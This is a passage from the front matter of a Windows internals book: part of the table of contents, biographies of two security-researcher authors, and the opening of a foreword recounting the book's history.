Application hives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .402
Transactional Registry (TxR) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .403
Monitoring registry activity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Process Monitor internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .405
Registry internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406
Hive reorganization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
The registry namespace and operation . . . . . . . . . . . . . . . . . . . . . . . . . 415
Stable storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .422
Registry virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .422
Registry optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .425
Windows services. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .426
Service applications. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .426
Service accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .433
The Service Control Manager (SCM) . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
Contents
xi
Service control programs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .450
Autostart services startup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451
Delayed autostart services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .457
Triggered-start services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .458
Startup errors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .459
Accepting the boot and last known good . . . . . . . . . . . . . . . . . . . . . . .460
Service failures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .462
Service shutdown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 464
Shared service processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .465
Service tags . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .468
User services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .469
Packaged services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .473
Protected services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .474
Task scheduling and UBPM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .475
The Task Scheduler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .476
. . . . . . . . . . . . . . . . . . 481
Task Scheduler COM interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .486
Windows Management Instrumentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .486
WMI architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .487
WMI providers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .488
The Common Information Model and the Managed
Object Format Language . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .489
Class association . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .493
WMI implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .496
WMI security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .498
Event Tracing for Windows (ETW) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .499
ETW initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
ETW sessions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .502
ETW providers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .506
Providing events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .509
ETW Logger thread . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 511
Consuming events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 512
System loggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 516
ETW security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .522
xii
Contents
Dynamic tracing (DTrace) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .525
Internal architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .528
DTrace type library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .534
Windows Error Reporting (WER) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .535
User applications crashes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .537
Kernel-mode (system) crashes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .543
Process hang detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 551
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .554
Kernel shims . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .557
Shim engine initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .557
The shim database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .559
Driver shims . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .560
Device shims . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .564
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .564
Chapter 11 Caching and file systems
Terminology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .565
Key features of the cache manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .566
Single, centralized system cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .567
The memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .567
Cache coherency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .568
Virtual block caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .569
Stream-based caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .569
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .570
NTFS MFT working set enhancements . . . . . . . . . . . . . . . . . . . . . . . . . . 571
Memory partitions support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 571
Cache virtual memory management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .572
Cache size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .574
Cache virtual size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .574
Cache working set size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .574
Cache physical size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .574
Cache data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .576
Systemwide cache data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .576
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .579
Contents
xiii
File system interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .582
Copying to and from the cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .584
Caching with the mapping and pinning interfaces . . . . . . . . . . . . . . .584
Caching with the direct memory access interfaces . . . . . . . . . . . . . . .584
Fast I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .585
Read-ahead and write-behind . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .586
Intelligent read-ahead . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .587
Read-ahead enhancements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .588
Write-back caching and lazy writing . . . . . . . . . . . . . . . . . . . . . . . . . . . .589
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .595
Forcing the cache to write through to disk . . . . . . . . . . . . . . . . . . . . . .595
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .595
Write throttling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .596
System threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .597
Aggressive write behind and low-priority lazy writes . . . . . . . . . . . .598
Dynamic memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .599
Cache manager disk I/O accounting . . . . . . . . . . . . . . . . . . . . . . . . . . . .600
File systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .602
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .602
CDFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .602
UDF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .603
FAT12, FAT16, and FAT32 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .603
exFAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .606
NTFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .606
ReFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .608
File system driver architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .608
Local FSDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .608
Remote FSDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 610
File system operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 619
. . . . . . . . . .622
Cache manager’s lazy writer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .622
Cache manager’s read-ahead thread . . . . . . . . . . . . . . . . . . . . . . . . . . .622
Memory manager’s page fault handler . . . . . . . . . . . . . . . . . . . . . . . . .623
. . . . . . . . . . . . . . . . . . . . . . . . . .623
xiv
Contents
Filtering named pipes and mailslots . . . . . . . . . . . . . . . . . . . . . . . . . . . .625
Controlling reparse point behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . .626
Process Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .627
The NT File System (NTFS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .628
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .628
Recoverability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .629
Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .629
Data redundancy and fault tolerance . . . . . . . . . . . . . . . . . . . . . . . . . . .629
Advanced features of NTFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .630
Multiple data streams . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
Unicode-based names . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .633
General indexing facility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .633
Dynamic bad-cluster remapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .633
Hard links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .634
Symbolic (soft) links and junctions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .634
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .637
Change logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .637
Per-user volume quotas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .638
Link tracking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .639
Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 640
POSIX-style delete semantics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 641
Defragmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .643
Dynamic partitioning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .646
NTFS support for tiered volumes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .647
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .652
NTFS on-disk structure. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .654
Volumes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .655
Clusters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .655
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .656
File record numbers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .660
File records . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 661
File names . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .664
Tunneling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .666
Resident and nonresident attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . .667
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .670
Contents
xv
Compressing sparse data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 671
Compressing nonsparse data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .673
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .675
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .675
Indexing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .679
Object IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 681
Quota tracking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 681
Consolidated security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .682
Reparse points . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .684
Storage reserves and NTFS reservations . . . . . . . . . . . . . . . . . . . . . . . . .685
Transaction support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .688
Isolation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .689
Transactional APIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .690
On-disk implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 691
Logging implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .693
NTFS recovery support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .694
Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .694
Metadata logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .695
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .695
Log record types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .697
Recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .699
Analysis pass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .700
Redo pass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 701
Undo pass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 701
NTFS bad-cluster recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .703
Self-healing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .706
Online check-disk and fast repair . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .707
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 710
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 713
The decryption process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 715
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 716
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 717
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 717
Online encryption support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 719
xvi
Contents
Direct Access (DAX) disks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .720
DAX driver model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 721
DAX volumes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .722
Cached and noncached I/O in DAX volumes . . . . . . . . . . . . . . . . . . . .723
Mapping of executable images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .724
Block volumes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .728
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .730
Flushing DAX mode I/Os . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 731
Large and huge pages support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .732
Virtual PM disks and storages spaces support . . . . . . . . . . . . . . . . . . .736
Resilient File System (ReFS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .739
Minstore architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .740
B+ tree physical layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .742
Allocators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .743
Page table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .745
Minstore I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .746
ReFS architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .748
ReFS on-disk structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 751
Object IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .752
Security and change journal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .753
ReFS advanced features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .754
File’s block cloning (snapshot support) and sparse VDL . . . . . . . . . .754
ReFS write-through . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .757
ReFS recovery support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .759
Leak detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 761
Shingled magnetic recording (SMR) volumes . . . . . . . . . . . . . . . . . . .762
ReFS support for tiered volumes and SMR . . . . . . . . . . . . . . . . . . . . . . .764
Container compaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .766
Compression and ghosting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .769
Storage Spaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .770
Spaces internal architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 771
Services provided by Spaces. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .772
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .776
Contents
xvii
Chapter 12 Startup and shutdown
777
Boot process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .777
The UEFI boot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .777
The BIOS boot process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 781
Secure Boot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 781
The Windows Boot Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .785
The Boot menu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .799
Launching a boot application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .800
Measured Boot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 801
Trusted execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .805
The Windows OS Loader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .808
Booting from iSCSI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 811
The hypervisor loader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 811
VSM startup policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 813
The Secure Launch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 816
Initializing the kernel and executive subsystems . . . . . . . . . . . . . . . . . 818
Kernel initialization phase 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .824
Smss, Csrss, and Wininit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .830
ReadyBoot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .835
Images that start automatically . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .837
Shutdown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .837
Hibernation and Fast Startup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 840
Windows Recovery Environment (WinRE) . . . . . . . . . . . . . . . . . . . . . . .845
Safe mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .847
Driver loading in safe mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 848
Safe-mode-aware user programs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .849
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .850
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .850
Contents of Windows Internals, Seventh Edition, Part 1 . . . . . . . . . . . . . . . . .851
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .861
About the Authors
ANDREA ALLIEVI is a system-level developer and security research
engineer with more than 15 years of experience. He graduated from
the University of Milano-Bicocca in 2010 with a bachelor’s degree in
computer science. For his thesis, he developed a Master Boot Record
(MBR) Bootkit entirely in 64-bits, capable of defeating all the Windows
7 kernel-protections (PatchGuard and Driver Signing enforcement).
Andrea is also a reverse engineer who specializes in operating systems
internals, from kernel-level code all the way to user-mode code. He
published in 2012), multiple PatchGuard bypasses, and many other research papers and
articles. He is the author of multiple system tools and software used for removing mal-
ware and advanced persistent threads. In his career, he has worked in various computer
security companies—Italian TgSoft, Saferbytes (now MalwareBytes), and Talos group of
Cisco Systems Inc. He originally joined Microsoft in 2016 as a security research engineer
in the Microsoft Threat Intelligence Center (MSTIC) group. Since January 2018, Andrea
has been a senior core OS engineer in the Kernel Security Core team of Microsoft,
where he mainly maintains and develops new features (like Retpoline or the Speculation
Mitigations) for the NT and Secure Kernel.
Andrea continues to be active in the security research community, authoring technical
articles on new kernel features of Windows in the Microsoft Windows Internals blog, and
speaking at multiple technical conferences, such as Recon and Microsoft BlueHat. Follow
Andrea on Twitter at @aall86.
About the Authors
xix
ALEX IONESCU is the vice president of endpoint engineering at
CrowdStrike, Inc., where he started as its founding chief architect. Alex is
a world-class security architect and consultant expert in low-level system
software, kernel development, security training, and reverse engineering.
Over more than two decades, his security research work has led to the
repair of dozens of critical security vulnerabilities in the Windows kernel
and its related components, as well as multiple behavioral bugs.
Previously, Alex was the lead kernel developer for ReactOS, an open-source Windows
clone written from scratch, for which he wrote most of the Windows NT-based subsys-
tems. During his studies in computer science, Alex worked at Apple on the iOS kernel,
boot loader, and drivers on the original core platform team behind the iPhone, iPad, and
AppleTV. Alex is also the founder of Winsider Seminars & Solutions, Inc., a company that
specializes in low-level system software, reverse engineering, and security training for
various institutions.
Alex continues to be active in the community and has spoken at more than two dozen
events around the world. He offers Windows Internals training, support, and resources
to organizations and individuals worldwide. Follow Alex on Twitter at @aionescu and his
blogs at www.alex-ionescu.com and www.windows-internals.com/blog.
Foreword
H
aving used and explored the internals of the wildly successful Windows 3.1 operat-
ing system, I immediately recognized the world-changing nature of Windows NT 3.1
when Microsoft released it in 1993. David Cutler, the architect and engineering leader for
Windows NT, had created a version of Windows that was secure, reliable, and scalable,
but with the same user interface and ability to run the same software as its older yet
more immature sibling. Helen Custer’s book Inside Windows NT was a fantastic guide to
its design and architecture, but I believed that there was a need for and interest in a book
that went deeper into its working details. VAX/VMS Internals and Data Structures, the
you could get with text, and I decided that I was going to write the Windows NT version
of that book.
-
ware company. To learn about Windows NT, I read documentation, reverse-engineered
its code, and wrote systems monitoring tools like Regmon and Filemon that helped me
understand the design by coding them and using them to observe the under-the-hood
views they gave me of Windows NT’s operation. As I learned, I shared my newfound
knowledge in a monthly “NT Internals” column in Windows NT Magazine, the magazine
for Windows NT administrators. Those columns would serve as the basis for the chapter-
length versions that I’d publish in Windows Internals, the book I’d contracted to write
with IDG Press.
My book deadlines came and went because my book writing was further slowed by
my full-time job and time I spent writing Sysinternals (then NTInternals) freeware and
commercial software for Winternals Software, my startup. Then, in 1996, I had a shock
when Dave Solomon published Inside Windows NT, 2nd Edition. I found the book both
impressive and depressing. A complete rewrite of the Helen’s book, it went deeper and
broader into the internals of Windows NT like I was planning on doing, and it incorpo-
rated novel labs that used built-in tools and diagnostic utilities from the Windows NT
Resource Kit and Device Driver Development Kit (DDK) to demonstrate key concepts and
behaviors. He’d raised the bar so high that I knew that writing a book that matched the
quality and depth he’d achieved was even more monumental than what I had planned.
As the saying goes, if you can’t beat them, join them. I knew Dave from the Windows
conference speaking circuit, so within a couple of weeks of the book’s publication I
sent him an email proposing that I join him to coauthor the next edition, which would
document what was then called Windows NT 5 and would eventually be renamed as
Foreword
xxi
Windows 2000. My contribution would be new chapters based on my NT Internals
column about topics Dave hadn’t included, and I’d also write about new labs that used
my Sysinternals tools. To sweeten the deal, I suggested including the entire collection of
Sysinternals tools on a CD that would accompany the book—a common way to distribute
software with books and magazines.
Dave was game. First, though, he had to get approval from Microsoft. I had caused
Microsoft some public relations complications with my public revelations that Windows NT
Workstation and Windows NT Server were the same exact code with different behaviors
based on a Registry setting. And while Dave had full Windows NT source access, I didn’t,
and I wanted to keep it that way so as not to create intellectual property issues with the
software I was writing for Sysinternals or Winternals, which relied on undocumented APIs.
The timing was fortuitous because by the time Dave asked Microsoft, I’d been repairing my
relationship with key Windows engineers, and Microsoft tacitly approved.
Writing Inside Windows 2000 with Dave was incredibly fun. Improbably and
completely coincidentally, he lived about 20 minutes from me (I lived in Danbury,
Connecticut and he lived in Sherman, Connecticut). We’d visit each other’s houses for
marathon writing sessions where we’d explore the internals of Windows together, laugh
at geeky jokes and puns, and pose technical questions that would pit him and me in
-
bugger, and Sysinternals tools. (Don’t rub it in if you talk to him, but I always won.)
